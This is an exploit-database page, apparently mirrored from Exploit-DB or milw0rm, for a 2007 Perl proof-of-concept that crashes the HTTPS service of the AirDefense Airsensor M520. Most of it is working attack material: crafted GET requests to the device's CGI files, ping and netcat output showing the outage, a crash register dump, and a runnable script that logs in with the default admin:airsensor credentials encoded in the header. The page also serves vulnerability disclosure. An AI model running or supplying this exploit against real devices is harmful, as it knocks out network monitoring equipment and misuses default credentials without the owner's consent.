header-logo
Suggest Exploit
vendor:
Airsensor M520
by:
Unknown
N/A
CVSS
N/A
Denial of Service and Buffer Overflow
Unknown
CWE
Product Name: Airsensor M520
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC

The vulnerability is caused due to an unspecified error in the cgis files filter used for configure properties. This can be exploited by sending a specially crafted HTTPS request (necessary authentication), which will cause the HTTPS service on the system to crash.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#									
# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC		
#									
# The vulnerability is caused due to an unspecified error in the cgis	
# files filter used for configure propierties. This can be exploited by	
# sending a specially crafted HTTPS request (necessary authentication), 
# which will cause the HTTPS service on the system to crash.		
#									
# Requisites: "Use DHCP" option interface mark "No"		
#									
# Examples:								
# 									
# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1		
# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1		
# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1			
# 									
# Pinging:								
#									
# Before:								
#									
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64			
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64			
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64			
#									
# After:								
#									
# Hardware error.							
# Hardware error.							
# Hardware error.							
# Request timed out.							
# Request timed out.							
# Request timed out.							
#									
# C:\>nc -vvn 192.168.100.100 443					
# (UNKNOWN) [192.168.100.100] 443 (?): connection refused		
# sent 0, rcvd 0: NOTSOCK						
#
# Buffer Overflow debug log:
#
# 1970-01-01 00:00:15   SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR EXCEPTION ERROR
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4
# 1970-01-01 00:00:15   SYS-CRIT:: SENSOR Up Time:  00:08:51
# 1970-01-01 00:00:15   SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55
# 1970-01-01 00:00:15   SYS-CRIT:: Exception ID = 10 ( Reserved Instruction)
# 1970-01-01 00:00:15   SYS-CRIT:: Thread = HTTPD
# 1970-01-01 00:00:15   SYS-CRIT:: MIPS Register Dump:
# 1970-01-01 00:00:15   SYS-CRIT::  zero=0x00000000    at=0xfffffffe    v0=0x00000000    v1=0x00000000
# 1970-01-01 00:00:16   SYS-CRIT::    a0=0x00000000    a1=0x3d000000    a2=0x00000010    a3=0x00000041
# 1970-01-01 00:00:16   SYS-CRIT::    t0=0x00000000    t1=0x0000003d    t2=0x0000000b    t3=0x00000000
# 1970-01-01 00:00:16   SYS-CRIT::    t4=0x802f799c    t5=0xf43dd40f    t6=0x0066a1a4    t7=0x4df0e494
# 1970-01-01 00:00:16   SYS-CRIT::    s0=0x802f7dbf    s1=0x0000001f    s2=0x802f7910    s3=0x80120000
# 1970-01-01 00:00:16   SYS-CRIT::    s4=0x80120000    s5=0x80986c30    s6=0x80120000    s7=0x80128afc
# 1970-01-01 00:00:16   SYS-CRIT::    t8=0x480ec8cd    t9=0x742b7136    k0=0x802f78c8    k1=0x802f7910
# 1970-01-01 00:00:16   SYS-CRIT::    gp=0x8015b070    sp=0x802f7910    fp=0x80128aec    ra=0x800b2534
# 1970-01-01 00:00:16   SYS-CRIT:: Address of instruction that caused exception = 0x800b2534
# 1970-01-01 00:00:16   SYS-CRIT:: Memory address at which adress exception occured = 0x00000000
# 1970-01-01 00:00:16   SYS-CRIT:: Return address = 0x800b2534
# 1970-01-01 00:00:17   SYS-CRIT:: Status Reg = 0x1000af03
# 1970-01-01 00:00:17   SYS-CRIT:: Cache Reg = 0x00000000
# 1970-01-01 00:00:17   SYS-CRIT:: Cause Reg = 0x30000028
# 1970-01-01 00:00:17   SYS-CRIT:: Config Reg = 0x03fffbfb
# 1970-01-01 00:00:17   SYS-CRIT:: Vector = 40
# 1970-01-01 00:00:17   SYS-CRIT:: Processor Version = 0x00018009
# 1970-01-01 00:00:17   SYS-CRIT:: Stack Trace Begin: "->" = return address
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7910]=0x802f7dbf
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7914]=0x00000000
# 1970-01-01 00:00:17   SYS-CRIT::   [802f7918]=0x00000000
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7990]=0x80130000
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7994]=0x802f7db4
# 1970-01-01 00:00:19   SYS-CRIT::   [802f7998]=0x80152e18
# 1970-01-01 00:00:19   SYS-CRIT::   [802f799c]=0x80152ed8
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a0]=0x802f7dbf
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a4]=0x80986c30
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79a8]=0x802f8200
# 1970-01-01 00:00:19   SYS-CRIT:: ->[802f79ac]=0x800f0450	<- return address
# 1970-01-01 00:00:19   SYS-CRIT::   [802f79b0]=0x0d0a0074
# 1970-01-01 00:00:21   SYS-CRIT:: Stack Trace End:
#									
# The vulnerability has been reported in versions Airdefense		
#
# Firmware Version 4.3.1.1, Model = M520
# Firmware version 4.4.1.4, Model = M520				
# 
# More information: 	http://www.airdefense.net
#			http://support.airdefense.net
#
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.
#				
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, 
# pikah, codebreak, h3llfyr3
#					
# Alex Hernandez ahernandez [at] sybsecurity dot com
#

use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;

my $string = 	"%41%41%41";			# Strings to send
my $method = 	'GET';				# Method "GET" or "POST"
my $uri = 	'https://192.168.100.100';	# Factory default IP address 
my $content = 	"/adLog.cgi?";			# Cgi's file to crash

#my $content = 	"/ad.cgi?";
#my $content = 	"/post.cgi?";
#my $content = 	"/logout.cgi?";

my $headers = HTTP::Headers->new(

'Host:'                	=> '192.168.100.100',
'User-Agent:'          	=> 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
'Accept:'              	=> 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
'Accept-Language:'     	=> 'en-us,en;q=0.5',
'Accept-Charset:'   	=> 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',     
'Keep-Alive:'          	=> '300',
'Connection:'          	=> 'keep-alive',
'Referer:'       	=> 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
'Authorization:'	=> 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor

);

my $request = HTTP::Request->new($method, $uri, $headers, $content, $string);

my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content . "\n";

my $data;
	foreach my $pair (split('&', $response->content)) {
 		my ($k, $v) = split('=', $pair);
 		$data->{$k} = $v;
}

if ($data->{RESULT} != 0) {

	print "[+] Denial of Service exploit for Airsensor M520 Final\n";
	print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
	print "[+] Use:\n";
	print "\tperl -x dos_sensor.pl\n";
 	print $data->{RESPMSG} . "\n";
	exit(0);

} else {

 	print "[+] Denial of service Exploit successed!!!\n";
	print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";
}

# milw0rm.com [2007-09-18]